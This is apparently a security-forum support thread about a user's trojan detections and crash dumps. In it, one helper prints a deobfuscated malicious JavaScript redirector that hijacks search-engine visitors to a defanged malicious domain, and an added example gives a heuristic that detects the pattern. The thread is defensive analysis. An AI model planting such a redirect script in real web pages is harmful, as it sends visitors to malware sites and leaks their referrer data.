J S Fake

I had a blue screen recently but could not read what it was. Meanwhile I did several scans and found JS Fraud with Kaspersky and afterwards scanned the folder with my resident Avast V. 4.8 Home. It found a trojan JS Fake in the same location and prompted me to send it to the Chest. However, access was denied (maybe because I was in Safe Mode?) and next I deleted it successfully.

But I am worried that something may be still lurking, especially as I found in one of the Avast logs the following, which I had no idea had attacked me.

Any help much appreciated.

I think you have tried to access all those pr0n sites out there, haven’t you?

Does that mean that you will not help me?

Thanks

It's like hitting yourself with a sledgehammer, going to a doctor and asking whether he will treat you or not.

Pr0n sites are the ones which host malware. They reach your computer before it is detected by someone. I would say not to visit any such sites.

Ok, I understand. But will you help me?

Thanks

Oki, which is your OS?

XP Home SP3

Thanks

Go to c:\windows\. Do you see any folder named minidump?

Yes and there are 3 icons in it

qim

Hi qim,

These are mainly finds because you surf to infested sites and the avast shield flags and then disconnects so you will not get infected.
As a second barrier against these sites you could consider to use the latest version of Firefox browser - get Firefox here: http://www.mozilla-europe.org/nl/firefox/
with the NoScript extension. Get NoScript here: https://addons.mozilla.org/nl/firefox/addon/722
Please make the links in your post non-clickable by using hXtp:// or wXw
Web page security reports for these sites were not available, and should be checked separately e.g. like this at: hXtp://charlescurtiss.com/speyq/ejwts/2.js

Exploits

No exploits were identified at wepawet scan. Obfuscation flagged by avast
eval exploit as http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:JS/Redirector.I

Deobfuscation results


Evals

function f(){
  var r = document.referrer, t = "", q;
  if (r.indexOf("google.") !=- 1)t = "q";
  if (r.indexOf("msn.") !=- 1)t = "q";
  if (r.indexOf("yahoo.") !=- 1)t = "p";
  if (r.indexOf("altavista.") !=- 1)t = "q";
  if (r.indexOf("aol.") !=- 1)t = "query";
  if (r.indexOf("ask.") !=- 1)t = "q";
  if (r.indexOf("comcast.") !=- 1)t = "q";
  if (r.indexOf("bellsouth.") !=- 1)t = "string";
  if (r.indexOf("netscape.") !=- 1)t = "query";
  if (r.indexOf("mywebsearch.") !=- 1)t = "searchfor";
  if (r.indexOf("peoplepc.") !=- 1)t = "q";
  if (r.indexOf("starware.") !=- 1)t = "qry";
  if (r.indexOf("earthlink.") !=- 1)t = "q";
  if (t.length && ((q = r.indexOf("?" + t + "=")) !=- 1 || (q = r.indexOf("&" + t + "="))^^
   !=- 1))window.location = ("hXtp://webtrustrank1.net/in.cgi?9&seoref=^^" + 
  encodeURIComponent(document.referrer) + ^^^^"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + 
  encodeURIComponent(document.URL) + "&default_keyword=default");
}
window.onFocus = f()
(repeated 1 time)[^broken by me -pol]

What is the present status of webtrustrank1.net?
The site hxtp://webtrustrank1.net is classified as suspicious - visiting this site can seriously damage your computer. This warning is given when third parties add malcode to trusted sites,

polonus
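
The deobfuscated script in the post above only redirects visitors whose referrer is a search-engine results page, so the owner of the page rarely sees it fire. As an added example (not part of the thread, and not avast or wepawet code), this is a static heuristic that flags that pattern in script text; `SEARCH_HOSTS`, `scanScript`, the threshold of two host matches and both sample strings are assumptions made for the illustration.

```javascript
// Added example: static heuristic for search-referrer-gated redirect scripts.
// SEARCH_HOSTS, scanScript and both samples are constructed for illustration.
const SEARCH_HOSTS = ["google.", "msn.", "yahoo.", "altavista.", "aol.", "ask."];

function scanScript(source) {
  // Signal 1: the script inspects where the visitor came from.
  const readsReferrer = /document\.referrer/.test(source);

  // Signal 2: it compares against several search-engine host fragments.
  const hostHits = SEARCH_HOSTS.filter(
    (h) => source.includes('"' + h + '"') || source.includes("'" + h + "'")
  );

  // Signal 3: it navigates the window (an assignment, not a == comparison).
  const navigates =
    /\blocation(\.href)?\s*=[^=]/.test(source) ||
    /\blocation\.(replace|assign)\s*\(/.test(source);

  // Signal 4: the referrer or page URL is forwarded to the destination.
  const forwardsReferrer =
    /encodeURIComponent\s*\(\s*document\.(referrer|URL)\s*\)/.test(source);

  const suspicious = readsReferrer && hostHits.length >= 2 && navigates;
  return { suspicious, readsReferrer, hostHits, navigates, forwardsReferrer };
}

// Constructed sample shaped like the script above; the domain is a placeholder.
const SAMPLE_REDIRECTOR = `
var r = document.referrer, t = "";
if (r.indexOf("google.") != -1) t = "q";
if (r.indexOf("yahoo.") != -1) t = "p";
if (t.length) window.location = "http://redirect.example.invalid/in.cgi?ref=" +
  encodeURIComponent(document.referrer);
`;

// Constructed benign sample: reads the referrer once, never navigates.
const SAMPLE_ANALYTICS = `
var r = document.referrer;
if (r.indexOf("google.") != -1) { trackVisit("search"); }
`;

console.log(scanScript(SAMPLE_REDIRECTOR).suspicious);
console.log(scanScript(SAMPLE_ANALYTICS).suspicious);
```

A hit is a reason to look at the script by hand, not a verdict; it only works on script text that has already been deobfuscated.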

what are the extensions of the files in it?

Mini040307-01.dmp
Mini052109-01.dmp
Mini100109-01.dmp

qim

upload it to mediafire.com and give the link, let me see it. :-\

Hi Polonus

Thank you very much, but I am afraid I did not understand your post. What is the meaning of:

What is the present status of webtrustrank1.net?
The site hxtp://webtrustrank1.net is classified as suspicious - visiting this site can seriously damage your computer.

Nmb is helping me, by the way.

Thank you again

qim

Polonus is one of the senior guys out here in this field. I’m nothing in front of them.

Hi Nmb

I never used Mediafire. It is uploading the 3 files. But how do you get them?

qim

it will give the link to download them. copy and paste the link here.

It means a very bad page http://www.mywot.com/en/scorecard/webtrustrank1.net

I’m not sure this is what you want…

Let me know

thanks

qim

Yeah, got them… but you need to click the share button on the right and it will give you a sharing url. You need to paste that here. Remove the previous link you gave. I will see the dumps… will get back to you… in that time edit your posts. Change all the http to hxxp and change your mediafire links.